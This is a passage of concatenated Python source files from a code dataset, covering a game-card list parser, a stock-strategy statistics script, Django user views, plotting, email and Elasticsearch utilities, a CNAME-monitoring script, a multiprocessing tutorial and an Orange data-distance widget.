len(row) == 0:\n continue\n\n if len(row) >= 3 and string_represent_int(row[-2]) and row[-1].upper() in [\"TRUE\", \"FALSE\", \"\"]:\n \"\"\"The line scanned is in the same format as the output of our program\"\"\"\n name = \"\".join(row[:-2])\n game = Game(name)\n game.id = row[-2]\n game.card_status_known = row[-1] != \"\"\n game.has_cards = game.card_status_known and row[-1].upper() == \"TRUE\"\n else:\n \"\"\"The line wasn't written by us. 
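It lacks the trailing appid and TRUE/FALSE status columns that our exporter writes. 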
Assuming it is all one long name\"\"\"\n                name = \"\".join(row)\n                game = Game(name)\n            yield game\n\n\ndef users_game_list(path):\n    return list(users_game_gen(path))\n\n\ndef main():\n    path_in = \"Test/big_list.txt\"\n    path_out = \"Test/big_list_out.csv\"\n\n    init_log(filename=\"log.txt\", console=True, level=logging.DEBUG)\n    logging.info(\"Loading configuration file\")\n    config = load_config_file(\"./config.txt\")\n    logging.info(\"Loading AppList\")\n    app_list = AppList().fetch()\n    logging.info(\"Creating timer\")\n    sleep = Delayer(50, 1.5, 15)\n    logging.info(\"Creating an exporter\")\n    with closing(Exporter(Exporter.CSVFile(path_out), Exporter.Log())) as export:\n\n        for game in users_game_gen(path_in):\n            err = False\n            logging.info(\"Processing: %s\", game.users_name)\n            accessed_net = game.find_id(app_list, config)\n            if game.id is None:\n                logging.error(\"Couldn't find ID for %s\", game.users_name)\n                err = True\n\n            if not err:\n                accessed_net = game.fetch_card_info() or accessed_net # Order is important here. You don't want to short-circuit the fetch.\n                if not game.card_status_known:\n                    logging.error(\"Couldn't find cards status for %s\", game.users_name)\n                    err = True\n\n            if not err:\n                export.write(game)\n\n            if accessed_net: # We go to sleep if we went online, regardless of \"err\" and our success with fetching the cards.\n                sleep.tick()\n\n    logging.shutdown()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Release/v1.0/python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":17927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"54260995","text":"from GCF.DB.PriceInfoDao import PriceInfoDao\nfrom GCF.DB.UpDownCountDao import UpDownCountDao\nfrom GCF.strategy.NearMAStrategy import NearMAStrategy\n\n\nclass FutureResult:\n    def __init__(self):\n        self.code = None\n        self.start_date = None\n        self.future_days = None\n        self.percent = None\n        self.is_up = None\n\n    def __str__(self):\n        return self.code + ', ' + self.start_date + ', within ' + str(self.future_days) + ' days: ' + str(self.percent)\n\n\nclass StatisticWinRateOf60MA:\n    def __init__(self):\n        self.upDownCountDao = UpDownCountDao('../DB/consider.db')\n        self.priceInfoDao = PriceInfoDao('../DB/winner.db')\n        self.nearMAStrategy = NearMAStrategy()\n\n    def check_up_percent(self, priceInfos, index, in_days):\n        if len(priceInfos) < index:\n            return False\n        price_near_60ma = priceInfos[index]\n        price_future = priceInfos[index - in_days]\n        diff = price_future.price - price_near_60ma.price\n        diff_percent = diff / price_near_60ma.price\n        return diff_percent\n\n    # single code history win rate\n    def get_win_rate_of_one_code(self, code, in_days):\n        priceInfos = self.priceInfoDao.get_records_by_code(code)\n        if len(priceInfos) < 60:\n            print('fewer than 60 days of data, skipping...')\n            return None\n        futureResults = []\n        futureResultsFiltered = []\n        for i in range(in_days, len(priceInfos) - 60): # walk the history only; the most recent days are left out\n            is_near = self.nearMAStrategy.do_specific_day(priceInfos, i)\n            if is_near:\n                percent = self.check_up_percent(priceInfos, i, in_days)\n                futureResult = FutureResult()\n                futureResult.code = code\n                futureResult.future_days = in_days\n                futureResult.percent = str(round(percent * 100, 2)) + '%'\n                futureResult.start_date = priceInfos[i].date\n\n                is_ma60_up = self.nearMAStrategy.check_ma_up(priceInfos, i, 6, 60)\n                is_ma60_under_ma5_current = self.nearMAStrategy.check_under_ma5(priceInfos, i, 60) # the MA5 of the current day\n\n                # the MA5 from 5 days before, to allow for some tolerance; sometimes a price arching up from below will also cross above the MA60 while the MA60 points upward.\n                
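# (note: the comment above says 5 days, but the code below looks 30 entries back)\n                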
self.nearMAStrategy.check_under_ma5(priceInfos, i+30, 60)\n futureResults.append(futureResult)\n if is_ma60_up and is_ma60_under_ma5_current and is_ma60_under_ma5_before5:\n futureResultsFiltered.append(futureResult)\n\n\n\n print('\\n\\n筛选后的结果:')\n print(len(futureResults))\n for futureResult in futureResults:\n print(futureResult)\n\n print('\\n\\n-----------过滤60MA朝上的结果:-----------')\n print(len(futureResultsFiltered))\n for futureResult in futureResultsFiltered:\n print(futureResult)\n return futureResults\n\n def get_win_rate_of_all(self):\n return\n\n\nif __name__ == '__main__':\n statistic = StatisticWinRateOf60MA()\n # statistic.get_win_rate_of_one_code('000001', 3)\n statistic.get_win_rate_of_one_code('000710', 3)\n","sub_path":"GCF/consider/StatisticWinRateOf60MA.py","file_name":"StatisticWinRateOf60MA.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"76355843","text":"import setuptools\n\nNAME = \"flask_kafka_logger\"\n\nsetuptools.setup(\n name=NAME,\n packages=setuptools.find_packages(exclude=['t', 't.*']),\n version=\"0.1\",\n description=\"flask kafka logger extension\",\n author=\"jian.fu\",\n author_email=\"jian.fu@17zuoye.com\",\n license='BSD',\n platforms=['any'],\n install_requires=[\"kafka-python\", \"python-json-logger\"],\n include_package_data=True,\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"440604086","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import ListView, DetailView\n\nfrom account.forms import SignUpForm\nfrom account.models import Profile\n\n\nclass IndexView(ListView):\n template_name = 'home_data_user.html'\n context_object_name = 'data_list'\n\n def get_queryset(self):\n\n db = Profile.objects.all()\n\n data_list = []\n\n status = {\n '1': 'Admin',\n '2': 'Staff'\n }\n\n for x in db:\n data = {\n 'pk': int(x.pk),\n 'username': x.username,\n 'first_name': x.first_name,\n 'last_name': x.last_name,\n 'email': x.email,\n 'status': status.get(x.status)\n }\n data_list.append(data)\n\n context = {\n 'dt': data_list\n }\n\n return context\n\n\nclass DataDetailView(DetailView):\n model = Profile\n template_name = 'home_data_user_detail.html'\n\n\ndef detail(request, pk, template_name='home_data_user_detail.html'):\n db = get_object_or_404(Profile, pk=pk)\n\n if db is not None:\n status = {\n '1': 'Admin',\n '2': 'Staff'\n }\n profile = {\n 'username': db.username,\n 'first_name': db.first_name,\n 'last_name': db.last_name,\n 'email': db.email,\n 'status': status.get(db.status)\n }\n else:\n profile = {\n 'username': '-',\n 'first_name': '-',\n 'last_name': '-',\n 'email': '-',\n 'status': '-'\n }\n\n context = {\n 'profile': profile\n }\n\n return render(request, template_name, context)\n\n\ndef create(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n\n if form.is_valid():\n if form.cleaned_data.get('password1') == form.cleaned_data.get('password2'):\n user = form.save()\n user.refresh_from_db()\n user.profile.username = form.cleaned_data.get('username')\n user.profile.first_name = form.cleaned_data.get('first_name')\n user.profile.last_name = form.cleaned_data.get('last_name')\n user.profile.email = 
form.cleaned_data.get('email')\n\n if form.cleaned_data.get('is_staff'):\n user.profile.status = '1'\n else:\n user.profile.status = '2'\n\n user.save()\n\n return redirect('home:data-user')\n\n form = SignUpForm()\n return render(request, 'home_data_user_create.html', {'form': form})\n\n\ndef edit(request, pk, template_name='home_data_user_edit.html'):\n data = get_object_or_404(User, pk=pk)\n form = SignUpForm(request.POST or None, instance=data)\n\n if form.is_valid():\n if form.cleaned_data.get('password1') == form.cleaned_data.get('password2'):\n user = form.save()\n user.refresh_from_db()\n user.profile.username = form.cleaned_data.get('username')\n user.profile.first_name = form.cleaned_data.get('first_name')\n user.profile.last_name = form.cleaned_data.get('last_name')\n user.profile.email = form.cleaned_data.get('email')\n\n if form.cleaned_data.get('is_staff'):\n user.profile.status = '1'\n else:\n user.profile.status = '2'\n\n user.save()\n\n return redirect('home:data-user')\n\n return render(request, template_name, {'form': form})\n\n\ndef delete(request, pk, template_name='confirm_delete.html'):\n contact = get_object_or_404(Profile, pk=pk)\n if request.method == 'POST':\n contact.delete()\n return redirect('home:data-user')\n return render(request, template_name, {'object': contact})\n\n","sub_path":"home/views/view_data_user.py","file_name":"view_data_user.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291153257","text":"import matplotlib.pyplot as plt\r\n# Part 1\r\nimport csv\r\n\r\nx=[]\r\ny=[]\r\nwith open('example.txt','r') as csvfile:\r\n plots = csv.reader(csvfile, delimiter = ',')\r\n for row in plots:\r\n x.append(int(row[0]))\r\n y.append(int(row[1]))\r\nplt.plot(x,y,label = 'Loaded from file!') \r\n\r\n# Part 2\r\nimport numpy as np\r\nx,y = np.loadtxt('example.txt',delimiter = ',',unpack = True)\r\nplt.plot(x,y,label = 'Loaded from file!') \r\n\r\n# part 3 Getting data from internet\r\n\r\nstock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement'\r\nsource_code = urllib.request.urlopen(stock_price_url).read\r\n\r\n\r\nplt.xlabel('x')\r\nplt.ylabel('y')\r\nplt.title('Scatter Plot demonstration')\r\nplt.legend()\r\nplt.show()","sub_path":"plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"77883176","text":"import logging\nimport threading\nfrom logging.handlers import RotatingFileHandler\n\nfrom wechatManager.config import BaseConfig, configs\n\n\nCONFIG = BaseConfig\nfrom wechatManager import core\n\ndef setup_log(CONFIG):\n \"\"\"配置日志\"\"\"\n\n # 设置日志的记录等级\n logging.basicConfig(level=CONFIG.LOG_LEVEL) # 调试debug级\n # 创建日志记录器,指明日志保存的路径、每个日志文件的最大大小、保存的日志文件个数上限\n file_log_handler = RotatingFileHandler(\"logs/log\", maxBytes=1024 * 1024 * 100, backupCount=10)\n # 创建日志记录的格式 日志等级 输入日志信息的文件名 行数 日志信息\n formatter = logging.Formatter('%(levelname)s %(filename)s:%(lineno)d %(message)s')\n # 为刚创建的日志记录器设置日志记录格式\n file_log_handler.setFormatter(formatter)\n # 为全局的日志工具对象(flask app使用的)添加日志记录器\n logging.getLogger().addHandler(file_log_handler)\n\n\n\ndef start_manage(config_name):\n global CONFIG\n CONFIG = configs[config_name]\n\n setup_log(CONFIG)\n while True: # 主循环\n try:\n dictKeys = core.onlineDict.keys()\n for userName in dictKeys:\n user = core.onlineDict[userName]\n if user.loading:\n if user.alive:\n if 
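The plot_data.py record above leaves "Part 3" unfinished: it calls urllib.request.urlopen without ever importing urllib, and references .read without calling it. Below is a minimal sketch of the presumed intent; whether the pythonprogramming.net endpoint still serves data is an assumption, not something the source confirms.

import urllib.request

# Presumed completion of "part 3 Getting data from internet" (endpoint availability assumed).
stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement'
source_code = urllib.request.urlopen(stock_price_url).read().decode()  # note: read(), not read

# The response can then be split per line and on ',' before plotting,
# exactly like the CSV handling in Part 1.
print(source_code[:300])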
user.receiveMsg:\n threading.Thread(target=user.run).start()\n user.receiveMsg = False\n else:\n threading.Thread(target=user.login).start()\n user.alive = True\n else:\n if user.online:\n user.logout()\n except RuntimeError as reason:\n print('index Error:', reason)\n\n\ndef create_admin(adminName):\n core.onlineDict[adminName] = core.User(adminName)\n core.onlineDict[adminName].cmdQR = CONFIG.CMDQR\n core.onlineDict[adminName].autoLogin = True\n core.onlineDict[adminName].loading = True","sub_path":"wechatManager/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306745698","text":"import re\nimport os\nimport smtplib\nfrom email.MIMEMultipart import MIMEMultipart \nfrom email.MIMEBase import MIMEBase \nfrom email.MIMEText import MIMEText \nfrom email.Utils import COMMASPACE, formatdate \nfrom email import Encoders \n\nSMTP_MAIL_FROM = \"\"\nSMTP_MAIL_SERVER = \"\"\n\n\ndef is_valid_email(email):\n return re.match(\"^.+\\\\@(\\\\[?)[a-zA-Z0-9\\\\-\\\\.]+\\\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\\\]?)$\", email) != None\n\ndef send_mail(to, subject, text, frm=SMTP_MAIL_FROM, is_html=False,\n files=[], cc=[], bcc=[]): \n assert type(to)==list \n assert type(files)==list \n assert type(cc)==list \n assert type(bcc)==list \n \n message = MIMEMultipart() \n message['From'] = frm \n message['To'] = COMMASPACE.join(to) \n message['Date'] = formatdate(localtime=True) \n message['Subject'] = subject \n message['Cc'] = COMMASPACE.join(cc) \n message.set_charset('UTF-8')\n\n \n if is_html:\n message.attach(MIMEText(text,'html'))\n else:\n message.attach(MIMEText(text,'plain'))\n \n for f in files: \n part = MIMEBase('application', 'octet-stream') \n part.set_payload(open(f, 'rb').read()) \n Encoders.encode_base64(part) \n part.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % os.path.basename(f)) \n message.attach(part) \n \n addresses = [] \n for x in to: \n addresses.append(x) \n for x in cc: \n addresses.append(x) \n for x in bcc: \n addresses.append(x) \n \n smtp = smtplib.SMTP(SMTP_MAIL_SERVER) \n smtp.sendmail(frm, addresses, message.as_string()) \n smtp.close()","sub_path":"nels-storage-commandlines/utils/mail_utils.py","file_name":"mail_utils.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"122551728","text":"# -*- coding:utf-8 -*-\n# @Desc : \n# @Author : Administrator\n\n## 什么是程序: 例如xxx.py这是程序,是一个静态的\n## 什么是进程: 正在运行的应用程序就是一个进程;进程是资源分配的基本单元\n\n## 进程的状态:\n# 工作中,任务数往往大于CPU的核数,即一定有一些任务正在执行,而另外一些任务在等待CPU进行执行,因此导致了有了不同的状态\n# 就绪态: 运行的条件都已经满足,正在等待CPU执行\n# 执行态: CPU正在执行其功能\n# 等待态: 等待某些条件满足,例如一个程序sleep了,此时就处于等待态\n\n\n## 创建进程对象: multiprocessing.Process()\n# 参数说明:\n# target 如果传递了函数的引用,子进程就执行这里面的内容\n# name 进程设定名称,默认为Process-N,N为从1开始递增的整数\n# args 元组,给target指定的函数传递的参数,以元组的方式传递\n# kwargs 字典,给target指定的函数传递的参数,以关键字方式传递\n\n## multiprocessing.Process进程类提供了哪些属性:\n# pid: 当前进程的pid(进程号)\n\n## multiprocessing.Process进程类提供了哪些方法:\n# start(): 启动子进程实例(创建子进程)\n# is_alive(): 判断进程子进程是否还在活着\n# join([timeout]): 是否等待子进程执行结束,或等待多少秒\n# terminate(): 不管任务是否完成,立即终止子进程\n\n## 线程与进程的区别:\n# 进程: 能够完成多任务,如: 一台电脑上能够同时运行多个多个QQ\n# 线程: 能够完成多任务,如: 一个QQ中得多个聊天窗口\n\n\n##############################################################################################\n\nimport multiprocessing\nimport time\n\ndef test1():\n \"\"\" 子进程要执行的代码 \"\"\"\n while True:\n print(\" --- test1 --- \")\n 
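send_mail in mail_utils.py targets Python 2 (the email.MIMEMultipart import path does not exist on Python 3). A minimal usage sketch under that assumption follows; the address, subject, and attachment path are placeholders, not values from the source, and it assumes SMTP_MAIL_FROM and SMTP_MAIL_SERVER (empty strings in the module) have been filled in first.

# Python 2 usage sketch for mail_utils.send_mail; module assumed importable from the path.
from mail_utils import is_valid_email, send_mail

recipient = 'ops@example.com'  # placeholder address
if is_valid_email(recipient):
    send_mail(to=[recipient],               # to, cc, bcc and files must all be lists
              subject='nightly report',
              text='<b>All jobs finished.</b>',
              is_html=True,                 # body is wrapped as MIMEText(..., 'html')
              files=['/tmp/report.csv'])    # attachments are base64-encoded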
time.sleep(1)\n\ndef test2():\n \"\"\" 子进程要执行的代码 \"\"\"\n while True:\n print(\" --- test2 --- \")\n time.sleep(1)\n\n# def main():\n#\n# p1 = multiprocessing.Process(target=test1)\n# p2 = multiprocessing.Process(target=test2)\n# p1.start()\n# p2.start()\n\n\n#############################################################################################\n\n## 通过队列完成多进程之间通信\n\ndef download_from_web(q):\n \"\"\" 下载数据 \"\"\"\n # 模拟从网上下载数据\n data = [11,22,33,44,55]\n # 向队列中写数据\n for temp in data:\n q.put(temp)\n print(\"下载器已经下载完了数据,并已存入队列中...\")\n\ndef analysis_data(q):\n \"\"\" 数据处理 \"\"\"\n waitting_analysis_data = list()\n # 从队列中取数据\n while True:\n data = q.get()\n waitting_analysis_data.append(data)\n if q.empty(): # 如果队列为空,退出循环\n break\n print(waitting_analysis_data)\n\n# def main():\n# # 创建一个队列\n# q = multiprocessing.Queue()\n#\n# # 创建多个进程,将队列的引用当做实参进行传递到里面\n# p1 = multiprocessing.Process(target=download_from_web, args=(q,))\n# p2 = multiprocessing.Process(target=analysis_data, args=(q,))\n# p1.start()\n# p2.start()\n\n\n#############################################################################################\n\n## 进程池: 可以指定最大进程数\n\n# from multiprocessing import Pool\nimport random, os\n\ndef worker(msg):\n t_start = time.time()\n print(\"%s开始执行,进程号为%d\" %(msg, os.getpid()))\n # random.random() 随机生成0~1之间的浮点数\n time.sleep(random.random()*2)\n t_stop = time.time()\n print(msg,\"执行完毕,耗时%0.2f\" % (t_stop - t_start))\n\npool = multiprocessing.Pool(3) # 定义一个进程池,最大进程数3\nfor i in range(10):\n # Pool.apply_async(要调用的目标函数,(传递给目标函数的参数元组,))\n # 每次循环将会用空闲出来的子进程去调用目标\n pool.apply_async(worker, args=(i,))\n\nprint(\" --- 开始 --- \")\npool.close() # 关闭进程池,关闭后po不在接受新的请求\npool.join() # 等待po中所有子进程执行完成,必须放在close语句之后\nprint(\" --- 结束 --- \")\n\n\n\nif __name__ == '__main__':\n # main()\n pass\n\n\n","sub_path":"[05]Python-线程与队列部分/02多任务-进程(multiprocessing)的总结.py","file_name":"02多任务-进程(multiprocessing)的总结.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"417784032","text":"import json\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\nfrom const import (\n SAMPLE_DATA_DIR,\n ES_HOST,\n ES_PORT\n)\n\nes = Elasticsearch(host= ES_HOST, port= ES_PORT)\nes = Elasticsearch()\n\ndef load_jsondata():\n with open(SAMPLE_DATA_DIR) as f:\n return json.load(f)\n#yığıt halinde veri yükleme işlemi\ndef insert_data_by_bulk(data):\n res = helpers.bulk(es, data)\n print(res)\n\n\nif __name__ == \"__main__\":\n demo_data_2 = load_jsondata()\n insert_data_by_bulk(demo_data_2)\n","sub_path":"compose_env/es_insert_bulk.py","file_name":"es_insert_bulk.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"199183198","text":"#!/opt/hopeservice/.venv/bin/python\n# -*- coding: UTF-8 -*-\n# @Time : 27/02/2018 10:00\n# @Author : yao.liu\n# @File : cname_detect.py\n# version : 1.0\n\nimport commands\nimport sys\nimport requests\nimport re\nfrom datetime import datetime\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\ndef cname_check(domain):\n '''dig测试域名'''\n cmd = ' dig @8.8.8.8 {0} '.format(domain)\n res = commands.getoutput(cmd)\n match = re.compile('ccgslb|chinacache',res)\n if match:\n return True\n else:\n return None\n\ndef sendmail(content):\n '''发送告警邮件'''\n #填写收件人\n data = {'tos': 'yao.liu@chinacache.com',\n 'subject': '[devops] cname_detect -域名已切回蓝汛加速',\n 'content': '{}'.format(content)}\n res = 
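The multiprocessing tutorial above defines download_from_web and analysis_data but leaves its driver commented out. Here is a minimal sketch of the wiring that commented-out main() describes; the join() calls are an addition so the parent waits for both children before exiting.

import multiprocessing

def main():
    # Shared queue handed to both child processes, as in the commented-out original.
    q = multiprocessing.Queue()
    p1 = multiprocessing.Process(target=download_from_web, args=(q,))  # producer from above
    p2 = multiprocessing.Process(target=analysis_data, args=(q,))      # consumer from above
    p1.start()
    p2.start()
    p1.join()  # wait for the producer to finish
    p2.join()  # then for the consumer

if __name__ == '__main__':
    main()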
requests.post('http://223.202.201.32:8700/email', data=data)\n\nif __name__ == '__main__':\n time_now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n domain_file = sys.argv[1]\n with open(domain_file,'r') as fn:\n for i in fn.readlines():\n if cname_check(i):\n content = '''您好【{0}】: \\\n
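cname_check in 61run2.py passes the dig output to re.compile as its second argument, where re.compile expects flags, so the call raises instead of matching. A corrected sketch of the presumed intent using re.search; commands.getoutput keeps the original's Python 2 style.

import commands  # Python 2 standard library, as in the original
import re

def cname_check(domain):
    '''Return True when dig output shows the domain resolving through ChinaCache.'''
    res = commands.getoutput('dig @8.8.8.8 {0}'.format(domain))
    return re.search(r'ccgslb|chinacache', res) is not None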
域名切回至蓝汛服务
{1}'''.format(time_now,i)\n sendmail(content)\n\n","sub_path":"61run2.py","file_name":"61run2.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532188869","text":"from sqlalchemy import create_engine\nengine = create_engine('sqlite:///census.sqlite')\n\n# Create a connection on engine\nconnection = engine.connect()\n\n# Build select statement for census table: stmt\nstmt = 'SELECT * from census'\n\n# Execute the statement and fetch the results: results\nresults = connection.execute(stmt).fetchall()\n\n# Print results\nprint(results)\n\n\n\n# Import select\nfrom sqlalchemy import select\n\n# Reflect census table via engine: census\ncensus = Table('census', metadata, autoload=True, autoload_with=engine)\n\n# Build select statement for census table: stmt\nstmt = select([census])\n\n# Print the emitted statement to see the SQL string\nprint(stmt)\n\n# Execute the statement on connection and fetch 10 records: result\nresults = connection.execute(stmt).fetchmany(size=10)\n\n# Execute the statement and print the results\nprint(results)\n\n","sub_path":".history/mysql/script_01_20201119132146.py","file_name":"script_01_20201119132146.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"290290756","text":"## Automatically adapted for numpy.oldnumeric Oct 04, 2007 by \n\n\"\"\"\nData Distance\nComputes a distance matrix between data files.\nicons/ChipDistance.png\n1160\nPeter Juvan (peter.juvan@fri.uni-lj.si)\n\"\"\"\n\nimport numpy.oldnumeric as Numeric, numpy.oldnumeric.ma as MA\nimport statc\nimport orange, OWGUI\nfrom qt import *\nfrom qtcanvas import *\nfrom OWWidget import *\nfrom OWDataFiles import DataFiles\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", \"'strain'\", orange.AttributeWarning)\nwarnings.filterwarnings(\"ignore\", \"'dirname'\", orange.AttributeWarning)\n\n##############################################################################\n# main class\n\nclass OWDataDistance(OWWidget):\n settingsList = [\"Metrics\"]\n\n def __init__(self, parent=None, signalManager = None):\n OWWidget.__init__(self, parent, signalManager, 'Data Distance') \n \n self.inputs = [(\"Structured Data\", DataFiles, self.chipdata)]\n self.outputs = [(\"Distance Matrix\", orange.SymMatrix)]\n\n self.Metrics = 0\n self.loadSettings()\n self.data = []\n## self.metrics = [(\"Euclidean\", orange.ExamplesDistanceConstructor_Euclidean),\n## (\"Manhattan\", orange.ExamplesDistanceConstructor_Manhattan),\n## (\"Hamming\", orange.ExamplesDistanceConstructor_Hamming)]\n self.metrics = [(\"Manhattan\", distManhattan), (\"Euclidean\", distEuclidean), (\"1 - (Pearson correlation coefficient)\", distPearson), (\"1 - (Spearman rank correlation coefficient)\", distSpearman)]\n\n # GUI\n self.mainArea.setFixedWidth(0)\n # Info box\n box = QVGroupBox(\"Info\", self.controlArea)\n self.infoa = QLabel('No data on input.', box)\n self.infob = QLabel('', box)\n OWGUI.separator(self.controlArea)\n\n # Distance metrics selection\n items = [x[0] for x in self.metrics]\n OWGUI.comboBox(self.controlArea, self, \"Metrics\", box=\"Distance Metrics\", items=items,\n tooltip=\"Metrics to measure distance between data sets.\",\n callback=self.onMetricsChange)\n\n self.resize(384, 138)\n \n\n ##########################################################################\n # handling of input/output signals\n\n## def computeDistance(self, d1, 
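The SQLAlchemy script above reflects a census table but never imports Table or builds the MetaData object it passes in. A minimal sketch of the missing setup, assuming the same census.sqlite file and the SQLAlchemy 1.x API the script already uses:

from sqlalchemy import create_engine, MetaData, Table, select

engine = create_engine('sqlite:///census.sqlite')
connection = engine.connect()
metadata = MetaData()  # container for reflected table definitions

# Reflect the census table definition from the database schema.
census = Table('census', metadata, autoload=True, autoload_with=engine)

stmt = select([census])  # SQLAlchemy 1.x list form, matching the script
print(connection.execute(stmt).fetchmany(size=10))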
d2, dist):\n## \"\"\"employs orange to compute distances (slower)\n## \"\"\"\n## d = 0\n## for i in range(len(d1)):\n## d += dist(d1[i], d2[i])\n## d = d / len(d1)\n## return d\n\n def computeDistance(self, d1, d2):\n \"\"\"employs MA to cumpute distances (faster)\n \"\"\"\n return dist(d1.toNumpyMA(\"a\")[0], d2.toNumpyMA(\"a\")[0])\n\n\n def computeMatrix(self):\n if not self.data:\n self.send(\"Distance Matrix\", None)\n return\n## if self.Metrics == 0: # bug in orange, correct (remove normalize) once it is fixed\n## dist = self.metrics[self.Metrics][1](self.data[0], normalize=0)\n## else:\n## dist = self.metrics[self.Metrics][1](self.data[0]) \n matrix = orange.SymMatrix(len(self.data))\n matrix.setattr('items', self.data)\n self.progressBarInit()\n pbStep = 100./(len(self.data)**2/2. - len(self.data)/2.)\n for i in range(len(self.data)-1):\n for j in range(i+1, len(self.data)):\n## matrix[i, j] = self.computeDistance(self.data[i], self.data[j], dist)\n matrix[i, j] = self.metrics[self.Metrics][1](MA.ravel(self.data[i].toNumpyMA(\"a\")[0]), MA.ravel(self.data[j].toNumpyMA(\"a\")[0]))\n self.progressBarAdvance(pbStep)\n self.progressBarFinished()\n self.send(\"Distance Matrix\", matrix)\n\n\n def chipdata(self, data):\n self.data = []\n if data:\n self.infob.setText(\"\")\n numFiles = reduce(lambda a,b: a+len(b[1]), data, 0)\n lenSD = len(data)\n self.infoa.setText(\"%d set%s, total of %d data file%s.\" % (lenSD, [\"\",\"s\"][lenSD!=1], numFiles, [\"\",\"s\"][numFiles!=1]))\n numExamplesList = []\n # construct a list of ExampleTable lengths and a list of attribute names\n for (name, etList) in data:\n for et in etList:\n setattr(et,\"dirname\",name)\n setattr(et,\"strain\",name)\n self.data.append(et)\n numExamplesList.append(len(et))\n if len(self.data)>1:\n # test that files contain the same attributes and equal number of examples\n attrSorted = self.data[0].domain.attributes\n attrSorted.sort()\n numEx = len(self.data[0])\n for et in self.data[1:]:\n attrSorted2 = et.domain.attributes\n attrSorted2.sort()\n if map(lambda x: x.name, attrSorted) != map(lambda x: x.name, attrSorted2):\n self.data = []\n self.infob.setText(\"Error: data files contain different attributes, aborting distance computation.\")\n return\n if len(et) != numEx:\n self.data = []\n self.infob.setText(\"Error: data files contain unequal number of examples, aborting distance computation.\")\n return\n # compute distances\n pb = OWGUI.ProgressBar(self, iterations=len(self.data))\n self.computeMatrix()\n pb.finish()\n\n else:\n self.data = []\n self.infob.setText('Error: not enough data, aborting distance computation.')\n else:\n self.infoa.setText('No data on input.')\n\n\n def onMetricsChange(self):\n if self.data and len(self.data)>1:\n self.computeMatrix()\n\n\n\n###########################################################################\n# Distance Metrics\n###########################################################################\n\ndef distManhattan(x,y):\n \"\"\"normalized Manhattan distance\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n assert MA.rank(x) == MA.rank(y) == 1\n sumWeights = MA.add.reduce(MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y))).astype(Numeric.Float))\n return MA.add.reduce(MA.absolute(x-y)) / sumWeights\n\n\ndef distManhattanW(x,y,w):\n \"\"\"normalized weighted Manhattan distance\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n w = MA.asarray(w)\n assert MA.rank(x) == MA.rank(y) == MA.rank(w) == 1\n sumWeights = MA.add.reduce(w * 
MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y))).astype(Numeric.Float))\n return MA.add.reduce(w * MA.absolute(x-y)) / sumWeights\n\n\ndef distEuclidean(x,y):\n \"\"\"normalized euclidean distance\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n assert MA.rank(x) == MA.rank(y) == 1\n sumWeights = MA.add.reduce(MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y))).astype(Numeric.Float))\n return MA.sqrt(MA.add.reduce((x-y)**2) / sumWeights)\n\n\ndef distEuclideanW(x,y,w):\n \"\"\"normalized weighted euclidean distance\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n w = MA.asarray(w)\n assert MA.rank(x) == MA.rank(y) == MA.rank(w) == 1\n sumWeights = MA.add.reduce(w * MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y))).astype(Numeric.Float))\n return MA.sqrt(MA.add.reduce(w * (x-y)**2) / sumWeights)\n\n\ndef distPearson(x,y):\n \"\"\"distance corresponding to 1 - pearson's correlation coefficient for arrays x,y\n returns distance: 1 - pearson_r\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n assert MA.rank(x) == MA.rank(y) == 1\n cond = MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y)))\n return 1 - statc.pearsonr(MA.compress(cond,x).tolist(), MA.compress(cond,y).tolist())[0]\n\n\ndef distPearsonW(x,y,w):\n \"\"\"weighted distance corresponding to 1 - pearson's correlation coefficient for arrays x,y and weights w\n returns distance: 1 - pearson_r\n 